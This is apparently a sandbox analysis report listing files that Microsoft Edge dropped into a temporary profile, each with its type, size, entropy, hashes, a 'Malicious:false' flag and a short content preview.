                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):41
                                                                                                                                                              Entropy (8bit):4.704993772857998
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                              MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                              SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                              SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                              SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:.|.."....leveldb.BytewiseComparator......
                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):20480
                                                                                                                                                              Entropy (8bit):0.3528485475628876
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:12:TLiN6CZhDu6MvDOF5yEHFxOUwa5qguYZ75fOSiPe2d:TLiwCZwE8I6Uwcco5fBtC
                                                                                                                                                              MD5:F2B4FB2D384AA4E4D6F4AEB0BBA217DC
                                                                                                                                                              SHA1:2CD70CFB3CE72D9B079170C360C1F563B6BF150E
                                                                                                                                                              SHA-256:1ECC07CD1D383472DAD33D2A5766625009EA5EACBAEDE2417ADA1842654CBBC8
                                                                                                                                                              SHA-512:48D03991660FA1598B3E002F5BC5F0F05E9696BCB2289240FA8CCBB2C030CDD23245D4ECC0C64DA1E7C54B092C3E60AE0427358F63087018BF0E6CEDC471DD34
                                                                                                                                                              Malicious:false
                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                              File Type:data
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):131072
                                                                                                                                                              Entropy (8bit):0.002095330713584969
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:3:ImtVSstl:IiVSk
                                                                                                                                                              MD5:319655F3A91BE555AB83426E35998502
                                                                                                                                                              SHA1:41B4DCB192A115F52F44646DEAADC958FF2F8570
                                                                                                                                                              SHA-256:78E3F4BE4A5419D35A16F87276687DAE95404C4D77443E88107B797BA97802C8
                                                                                                                                                              SHA-512:EAE30ACA6321B2D5799DB71E078F4E5D687B384FAC8A5206E1CD1387B6029D5DFB1A806C00F3D62412D0E287EF536E0A5AC416CF3329613DED90D9168F5BF0D9
                                                                                                                                                              Malicious:false
                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 87, cookie 0x36, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):178176
                                                                                                                                                              Entropy (8bit):0.9401384989520177
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:192:Qrb2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+c:Q/2qOB1nxCkvSAELyKOMq+c
                                                                                                                                                              MD5:6817EEA7CE56E1AB1ECF93C090727E0F
                                                                                                                                                              SHA1:49A10B3D157FB49768284F68335CC7B378FB13B4
                                                                                                                                                              SHA-256:FF7B98237D2FA7537470A573B9FD12D9C656EDACC0949AA12B75970528F650CD
                                                                                                                                                              SHA-512:6E14A0B0A47B493493F6C0C8C2A15028C0C1D53E247D1FB2D227DC772ACFB6ADF2B74CBC8FB223156A1D39A1295FFF7EC054E9BE51DBF7BCE61CC597510C4EAE
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:SQLite format 3......@ .......W...........6....
                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                              File Type:data
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):2568
                                                                                                                                                              Entropy (8bit):0.06569804787746028
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:3:s/El1lOtlu:s/E7
                                                                                                                                                              MD5:E94343720FFDE90DF8BEB182292098F0
                                                                                                                                                              SHA1:8A33CE84D2D7C920B12C3B4FB290AF717711D40F
                                                                                                                                                              SHA-256:F764DCFAFF816B41E15C18E218BA0F3BCA8E0B6072320161E85A31DA7DBCD710
                                                                                                                                                              SHA-512:6B3879EC686E904BDD3A1DFBA928751B1665365666C8D52F04C8FB1CD54F0D729E85C6DE30A4343307D629F7871FF60A62602E450AFB31755D30BB8B481F3A1E
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:............dJ.3...W....
                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                              File Type:ASCII text, with very long lines (3852), with CRLF line terminators
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):11417
                                                                                                                                                              Entropy (8bit):5.237554345326078
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:192:dH4vrmORnBtW4PoiUDNaxvR5FCHFcoaSbqGEDu:dH4vrmonPW4jR3GaSbqGEDu
                                                                                                                                                              MD5:DF790948C5A7B5DD19D033FE6C793868
                                                                                                                                                              SHA1:0C4A681E07505CA84997CE78FEEE1F0D88CB8E2A
                                                                                                                                                              SHA-256:CB4049061A6A78013D20CC4AB396BEF4F6C35306887BE76765EED4E51EEE702D
                                                                                                                                                              SHA-512:251C3B5DE5452E2F40C648BDB2E3D1CE2315DD4DFFAF4B4E5E08528DBAAB80535F1A82E183A65AB7DCA0C2926AE5D6B61F06DB390D0E3B8D8E77E826B21042CB
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:{.. "ArbitrationSignal": "(time_elapsed_since_last_notification)-3600^(notification_quick_dismiss_rate_lower_ci+notification_disable_rate+notification_snooze_rate)",.. "DefaultCohort": {.. "21f3388b-c2a5-4791-8f6e-a4cad6d17f4f.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.BingHomePage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Covid.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Finance.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Jobs.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.KnowledgeCard.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Local.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.NTP3PCLICK.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.NotifySearchPage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Recipe.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.SearchPage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Sports.Bubble": 1,.. "2354565a-f41
                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                              File Type:very short file (no magic)
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):1
                                                                                                                                                              Entropy (8bit):0.0
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:3:L:L
                                                                                                                                                              MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                              SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                              SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                              SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:.
                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                              File Type:ASCII text
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):16
                                                                                                                                                              Entropy (8bit):3.2743974703476995
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                              MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                              SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                              SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                              SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:MANIFEST-000001.
                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                              File Type:ASCII text
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):16
                                                                                                                                                              Entropy (8bit):3.2743974703476995
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                              MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                              SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                              SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                              SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:MANIFEST-000001.
                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                              File Type:ASCII text
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):261
                                                                                                                                                              Entropy (8bit):5.284425935411061
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:6:HEFSlAEq1qLTwi23fQr/Hrl2KLlVEFSmJN9+q2PqLTwi23fQr/HrK+IFUv:koPfwZC1LsomJOv8wZC23FUv
                                                                                                                                                              MD5:75919257B38AA1AC7554A3776E0F9541
                                                                                                                                                              SHA1:9C39A60296A26221C376F212A6C9C66577C166A2
                                                                                                                                                              SHA-256:05EED9C8911E49C5E414A0243B0BFCDBA2F4C0255FFEB8DB215A091A690612D7
                                                                                                                                                              SHA-512:1EFD96326D8656989FFC76B96F96E824C704431A8E48695370BB5F9E34B6AA681ADE8DC144390902B625E24AC9C708F31A65A25A5C6FC3E86E33A018F729172C
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:2024/11/21-05:27:22.019 1d88 Creating DB C:\Users\user\AppData\Local\Temp\chr6BC.tmp\Default\shared_proto_db since it was missing..2024/11/21-05:27:22.042 1d88 Reusing MANIFEST C:\Users\user\AppData\Local\Temp\chr6BC.tmp\Default\shared_proto_db/MANIFEST-000001.
                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                              File Type:OpenPGP Secret Key
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):41
                                                                                                                                                              Entropy (8bit):4.704993772857998
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                              MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                              SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                              SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                              SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:.|.."....leveldb.BytewiseComparator......
                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                              File Type:ASCII text
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):16
                                                                                                                                                              Entropy (8bit):3.2743974703476995
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                              MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                              SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                              SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                              SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:MANIFEST-000001.
                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                              File Type:data
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):184
                                                                                                                                                              Entropy (8bit):3.7064843374216494
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:3:G0XttkJcsRwI9tkJcsIap3mEaXe/tlfmo1cgtfmEbQJkZt/fmoG:G0XtqcsqcpS3m9XOPmQ1mdkZt3mh
                                                                                                                                                              MD5:B35D474DF6A64D3841ECDF798DBE93FF
                                                                                                                                                              SHA1:DD4C3D2FDC5997B6DF5FB619420125F8D12D5449
                                                                                                                                                              SHA-256:924C5DED0B3D90B90AE8D7EC72CF1FCBEDF69402A2DF3302E462495D47D6BD1D
                                                                                                                                                              SHA-512:C4CFAEFB6DC71762ABEB055240B9D64F7EC573BA0FD165277DEF2658B8D605B78EEEE37092840731AA687CEFEF55341595A08CBD3871E32D02182F8EFE82159F
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:.h.6.................__global... .t...................__global... ..'i..................21_.....B....................33_......-.t.................21_......'..................33_.....
                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                              File Type:ASCII text
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):16
                                                                                                                                                              Entropy (8bit):3.2743974703476995
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                              MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                              SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                              SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                              SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:MANIFEST-000001.
                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                              File Type:ASCII text
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):279
                                                                                                                                                              Entropy (8bit):5.257615727799289
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:6:HEFS1jAEq1qLTwi23fQr/Hrzs52KLlVEFSvdX9+q2PqLTwi23fQr/HrzAdIFUv:ko1VfwZCs9LsoOv8wZC9FUv
                                                                                                                                                              MD5:FFA578AFBE829BB717633BB6F135AA4E
                                                                                                                                                              SHA1:8ADB0FCA31C24F578A23F10467EBF230D4525C28
                                                                                                                                                              SHA-256:4C005C5C7728A811CB5CA5000FA39C89305B26058FBC44F0D4A556DB861EAEC0
                                                                                                                                                              SHA-512:6A79E3CE2D0D6BD305844487BDD4BC3C69C44DA9E778BAEDDAA028A2733C564B37D4EF5C1B106330EC820B5CF945588689815C63D989FD137A2BF1BFE37F904F
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:2024/11/21-05:27:21.993 1d88 Creating DB C:\Users\user\AppData\Local\Temp\chr6BC.tmp\Default\shared_proto_db\metadata since it was missing..2024/11/21-05:27:22.016 1d88 Reusing MANIFEST C:\Users\user\AppData\Local\Temp\chr6BC.tmp\Default\shared_proto_db\metadata/MANIFEST-000001.
                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                              File Type:OpenPGP Secret Key
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):41
                                                                                                                                                              Entropy (8bit):4.704993772857998
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                              MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                              SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                              SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                              SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:.|.."....leveldb.BytewiseComparator......
                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):13
                                                                                                                                                              Entropy (8bit):2.7192945256669794
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:3:NYLFRQI:ap2I
                                                                                                                                                              MD5:BF16C04B916ACE92DB941EBB1AF3CB18
                                                                                                                                                              SHA1:FA8DAEAE881F91F61EE0EE21BE5156255429AA8A
                                                                                                                                                              SHA-256:7FC23C9028A316EC0AC25B09B5B0D61A1D21E58DFCF84C2A5F5B529129729098
                                                                                                                                                              SHA-512:F0B7DF5517596B38D57C57B5777E008D6229AB5B1841BBE74602C77EEA2252BF644B8650C7642BD466213F62E15CC7AB5A95B28E26D3907260ED1B96A74B65FB
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:117.0.2045.47
                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                              File Type:JSON data
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):1372
                                                                                                                                                              Entropy (8bit):5.5443902513238
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:24:YpQBqDPak7u5rrt1+/emJFyX8x9WwgyikOJdXmuBuwBwja9IENhlA+X7QQRCYfYg:YuBqDPafuJM8vmZRBzB4iIelA+EB0
                                                                                                                                                              MD5:385BE2D3EAEE8D782BB104CBC41056E5
                                                                                                                                                              SHA1:513716501759B5EC3ECAC0E60662E8F59F708AB4
                                                                                                                                                              SHA-256:1C4DE1B12E00DEE53ECD26D2C8F18BB2C17A5E4403A30F6A0A24834CF3321388
                                                                                                                                                              SHA-512:847306E2F352B18F14D586A893872EF8E3BDAAD016A15274C832DBF8D907154975F2816B5BDD9138E2C131F1920C2E9A8080E51F788DEB2AA30CD753D4FEF4E1
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:{"edge":{"perf_center":{"efficiency_mode_v2_is_active":false,"perf_game_mode":true,"performance_mode":3,"performance_mode_is_on":false}},"legacy":{"profile":{"name":{"migrated":true}}},"os_crypt":{"audit_enabled":true,"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAAC+iLm2Zr7aQKM/QMbOv3p0EAAAAB4AAABNAGkAYwByAG8AcwBvAGYAdAAgAEUAZABnAGUAAAAQZgAAAAEAACAAAABP3bqCLIIKULZltKi9naM/NsvjHziFuEObTMT1vXQENAAAAAAOgAAAAAIAACAAAABtMxtfCiQ0HI8W/DJehMIUsnPu/LG+d5TdDuLQSLjn5DAAAAC6rCjpeKykHLu1xImseQaYTi3WjJT27iNlfniGO7Co3Jrxmxi3LVrts6ZkzhjRGSVAAAAAHDkHlxhbJAEPhcLOFI09zETSMTMr9eCqhMrME9N2qmM6xEFhdzzUGADkw/sDe37nc9mKZvhc9lVMimzveK0Jng=="},"profile":{"info_cache":{},"profile_counts_reported":"13376658440579494","profiles_order":[]},"smartscreen":{"enabled":true,"pua_protection_enabled":false},"telemetry_client":{"install_source_name":"windows","os_integration_level":5,"updater_version":"1.3.177.11","windows_update_applied":false},"uninstall_metrics":{"installation_date2":"1732184840"},"user_experien
                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 2, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):20480
                                                                                                                                                              Entropy (8bit):0.46731661083066856
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:12:TL1QAFUxOUDaabZXiDiIF8izX4fhhdWeci2oesJaYi3is25q0S9K0xHZ75fOV:TLiOUOq0afDdWec9sJf5Q7J5fc
                                                                                                                                                              MD5:E93ACF0820CA08E5A5D2D159729F70E3
                                                                                                                                                              SHA1:2C1A4D4924B9AEC1A796F108607404B000877C5D
                                                                                                                                                              SHA-256:F2267FDA7F45499F7A01186B75CEFB799F8D2BC97E2E9B5068952D477294302C
                                                                                                                                                              SHA-512:3BF36C20E04DCF1C16DC794E272F82F68B0DE43F16B4A9746B63B6D6BBC953B00BD7111CDA7AFE85CEBB2C447145483A382B15E2B0A5B36026C3441635D4E50C
                                                                                                                                                              Malicious:false
                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                              File Type:FoxPro FPT, blocks size 512, next free block index 3284796609, field type 0
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):8192
                                                                                                                                                              Entropy (8bit):0.01057775872642915
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:3:MsFl:/F
                                                                                                                                                              MD5:CF89D16BB9107C631DAABF0C0EE58EFB
                                                                                                                                                              SHA1:3AE5D3A7CF1F94A56E42F9A58D90A0B9616AE74B
                                                                                                                                                              SHA-256:D6A5FE39CD672781B256E0E3102F7022635F1D4BB7CFCC90A80FFFE4D0F3877E
                                                                                                                                                              SHA-512:8CB5B059C8105EB91E74A7D5952437AAA1ADA89763C5843E7B0F1B93D9EBE15ED40F287C652229291FAC02D712CF7FF5ECECEF276BA0D7DDC35558A3EC3F77B0
                                                                                                                                                              Malicious:false
                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                              File Type:data
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):8192
                                                                                                                                                              Entropy (8bit):0.012096502606932763
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:3:MsEllllkXl:/M/6
                                                                                                                                                              MD5:259E7ED5FB3C6C90533B963DA5B2FC1B
                                                                                                                                                              SHA1:DF90EABDA434CA50828ABB039B4F80B7F051EC77
                                                                                                                                                              SHA-256:35BB2F189C643DCF52ECF037603D104035ECDC490BF059B7736E58EF7D821A09
                                                                                                                                                              SHA-512:9D401053AC21A73863B461B0361DF1A17850F42FD5FC7A77763A124AA33F2E9493FAD018C78CDFF63CA10F6710E53255CE891AD6EC56EC77D770C4630F274933
                                                                                                                                                              Malicious:false
                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                              File Type:data
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):8192
                                                                                                                                                              Entropy (8bit):0.011852361981932763
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:3:MsHlDll:/H
                                                                                                                                                              MD5:0962291D6D367570BEE5454721C17E11
                                                                                                                                                              SHA1:59D10A893EF321A706A9255176761366115BEDCB
                                                                                                                                                              SHA-256:EC1702806F4CC7C42A82FC2B38E89835FDE7C64BB32060E0823C9077CA92EFB7
                                                                                                                                                              SHA-512:F555E961B69E09628EAF9C61F465871E6984CD4D31014F954BB747351DAD9CEA6D17C1DB4BCA2C1EB7F187CB5F3C0518748C339C8B43BBD1DBD94AEAA16F58ED
                                                                                                                                                              Malicious:false
                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                              File Type:data
                                                                                                                                                              Category:modified
                                                                                                                                                              Size (bytes):8192
                                                                                                                                                              Entropy (8bit):0.012340643231932763
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:3:MsGl3ll:/y
                                                                                                                                                              MD5:41876349CB12D6DB992F1309F22DF3F0
                                                                                                                                                              SHA1:5CF26B3420FC0302CD0A71E8D029739B8765BE27
                                                                                                                                                              SHA-256:E09F42C398D688DCE168570291F1F92D079987DEDA3099A34ADB9E8C0522B30C
                                                                                                                                                              SHA-512:E9A4FC1F7CB6AE2901F8E02354A92C4AAA7A53C640DCF692DB42A27A5ACC2A3BFB25A0DE0EB08AB53983132016E7D43132EA4292E439BB636AAFD53FB6EF907E
                                                                                                                                                              Malicious:false
                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                              File Type:FoxPro FPT, blocks size 768, next free block index 3284796353, field type 0
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):262512
                                                                                                                                                              Entropy (8bit):9.553120663130604E-4
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:3:LsNl+nl/:Ls3+nt
                                                                                                                                                              MD5:99234E126218656E2223089DB2CA0C26
                                                                                                                                                              SHA1:C90AD9DF4F2206FE4632643FE7BA3C7CEEE0633D
                                                                                                                                                              SHA-256:A0137F3B1DBFB1FA98C74CC33F80E1F46BF58BC90323A38D32CF3B5798103B72
                                                                                                                                                              SHA-512:4FDBF72DDF9EA8A1EFF700EB267868CB6A0FE87CAE2536FB2086D8373AACF6A7EEF9862654FFFA38DBDE50AE0518CA8E5B46791FB3165493F7D0CA9741C84486
                                                                                                                                                              Malicious:false
                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):29
                                                                                                                                                              Entropy (8bit):3.922828737239167
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:3:2NGw+K+:fwZ+
                                                                                                                                                              MD5:7BAAFE811F480ACFCCCEE0D744355C79
                                                                                                                                                              SHA1:24B89AE82313084BB8BBEB9AD98A550F41DF7B27
                                                                                                                                                              SHA-256:D5743766AF0312C7B7728219FC24A03A4FB1C2A54A506F337953FBC2C1B847C7
                                                                                                                                                              SHA-512:70FE1C197AF507CC0D65E99807D245C896A40A4271BA1121F9B621980877B43019E584C48780951FC1AD2A5D7D146FC6EA4678139A5B38F9B6F7A5F1E2E86BA3
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:customSynchronousLookupUris_0
                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                              File Type:data
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):35302
                                                                                                                                                              Entropy (8bit):7.99333285466604
                                                                                                                                                              Encrypted:true
                                                                                                                                                              SSDEEP:768:rRhaFePY38QBsj61g3g01LXoDGPpgb8KbMcnjrQCckBuJyqk3x8cBBT:rLP+TBK6ZQLXSsaMcnHQQcox80
                                                                                                                                                              MD5:0E06E28C3536360DE3486B1A9E5195E8
                                                                                                                                                              SHA1:EB768267F34EC16A6CCD1966DCA4C3C2870268AB
                                                                                                                                                              SHA-256:F2658B1C913A96E75B45E6ADB464C8D796B34AC43BAF1635AA32E16D1752971C
                                                                                                                                                              SHA-512:45F1E909599E2F63372867BC359CF72FD846619DFEB5359E52D5700E0B1BCFFE5FF07606511A3BFFDDD933A0507195439457E4E29A49EB6451F26186B7240041
                                                                                                                                                              Malicious:false
                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):18
                                                                                                                                                              Entropy (8bit):3.5724312513221195
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:3:kDnaV6bVon:kDYa2
                                                                                                                                                              MD5:5692162977B015E31D5F35F50EFAB9CF
                                                                                                                                                              SHA1:705DC80E8B32AC8B68F7E13CF8A75DCCB251ED7D
                                                                                                                                                              SHA-256:42CCB5159B168DBE5D5DDF026E5F7ED3DBF50873CFE47C7C3EF0677BB07B90D4
                                                                                                                                                              SHA-512:32905A4CC5BCE0FE8502DDD32096F40106625218BEDC4E218A344225D6DF2595A7B70EEB3695DCEFDD894ECB2B66BED479654E8E07F02526648E07ACFE47838C
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:edgeSettings_2.0-0
                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                              File Type:JSON data
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):3581
                                                                                                                                                              Entropy (8bit):4.459693941095613
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:96:JTMhnytNaSA4BOsNQNhnUZTFGKDIWHCgL5tfHaaJzRHF+P1sYmnfHUdT+GWBH7Y/:KyMot7vjFU
